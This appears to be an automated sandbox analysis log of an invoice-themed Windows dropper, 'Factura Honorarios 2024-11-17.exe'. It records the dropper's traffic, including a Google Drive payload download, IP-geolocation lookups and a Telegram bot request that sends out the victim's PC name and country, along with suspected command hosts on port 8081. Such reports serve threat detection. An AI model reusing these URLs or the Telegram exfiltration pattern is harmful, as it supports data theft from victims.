          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49714 version: TLS 1.0
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20and%20Time:%2019/11/2024%20/%2002:39:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20128757%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: drive.google.com
          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 18 Nov 2024 12:51:14 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: Factura Honorarios 2024-11-17.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20a
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.000000003610D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005928000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/4
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005928000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/d
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005963000.00000004.00000020.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663661029.00000000073F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2193651298.00000000059A2000.00000004.00000020.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005928000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO&export=download
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005928000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO&export=downloadD
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036009000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035FC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036009000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035FC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187$
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.000000003613E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownHTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.8:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49730 version: TLS 1.2
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 0_2_0040542B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040542B
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_00403359
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeFile created: C:\Windows\resources\0809Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 0_2_00404C680_2_00404C68
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 0_2_0040698E0_2_0040698E
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 0_2_6FF41B630_2_6FF41B63
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_00404C683_2_00404C68
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_0040698E3_2_0040698E
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_0015C19B3_2_0015C19B
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_0015D2783_2_0015D278
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_001553623_2_00155362
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_0015C4683_2_0015C468
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_0015C7383_2_0015C738
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_0015E9883_2_0015E988
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_001569A03_2_001569A0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_001529E03_2_001529E0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_0015CA083_2_0015CA08
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_0015CCD83_2_0015CCD8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_00159DE03_2_00159DE0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_0015CFAC3_2_0015CFAC
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_00156FC83_2_00156FC8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_0015F9743_2_0015F974
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_0015E97C3_2_0015E97C
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_00153E093_2_00153E09
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F8FC683_2_38F8FC68
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F850283_2_38F85028
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F829683_2_38F82968
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F81E803_2_38F81E80
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F8E2583_2_38F8E258
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F817A03_2_38F817A0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F893283_2_38F89328
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F8D0F83_2_38F8D0F8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F8CCA03_2_38F8CCA0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F8CC8F3_2_38F8CC8F
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F800403_2_38F80040
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F850203_2_38F85020
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F89C183_2_38F89C18
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F800193_2_38F80019
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F8F8103_2_38F8F810
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F8DDF13_2_38F8DDF1
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F8D9A83_2_38F8D9A8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F8D9993_2_38F8D999
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F8D5503_2_38F8D550
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F895483_2_38F89548
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F8E6B03_2_38F8E6B0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F8E6A03_2_38F8E6A0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F81E703_2_38F81E70
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F8E2573_2_38F8E257
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F8E24D3_2_38F8E24D
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F8DE003_2_38F8DE00
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F8F3B83_2_38F8F3B8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F88BA03_2_38F88BA0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F88B913_2_38F88B91
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F8178F3_2_38F8178F
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F8EF603_2_38F8EF60
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F80B303_2_38F80B30
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F80B203_2_38F80B20
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_38F8EB083_2_38F8EB08
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391781D03_2_391781D0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391738B83_2_391738B8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391777203_2_39177720
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39177B783_2_39177B78
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39178FB03_2_39178FB0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3917A9383_2_3917A938
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3917E5383_2_3917E538
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3917A9283_2_3917A928
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3917C5583_2_3917C558
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3917E5483_2_3917E548
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39170D483_2_39170D48
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3917C5483_2_3917C548
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391711903_2_39171190
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3917119F3_2_3917119F
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391711A03_2_391711A0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3917E9D83_2_3917E9D8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3917C9D83_2_3917C9D8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3917E9C83_2_3917E9C8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391715F73_2_391715F7
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391715F83_2_391715F8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3917C9E83_2_3917C9E8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391715E83_2_391715E8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3917DC193_2_3917DC19
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3917FC183_2_3917FC18
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391760303_2_39176030
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3917BC383_2_3917BC38
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3917BC2A3_2_3917BC2A
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3917DC283_2_3917DC28
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391734503_2_39173450
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3917345F3_2_3917345F
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391700403_2_39170040
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391734603_2_39173460
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391704983_2_39170498
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391764883_2_39176488
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3917C0B73_2_3917C0B7
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3917E0B83_2_3917E0B8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3917E0A73_2_3917E0A7
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3917C0C83_2_3917C0C8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391708F03_2_391708F0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3917B3183_2_3917B318
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3917B3073_2_3917B307
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391723003_2_39172300
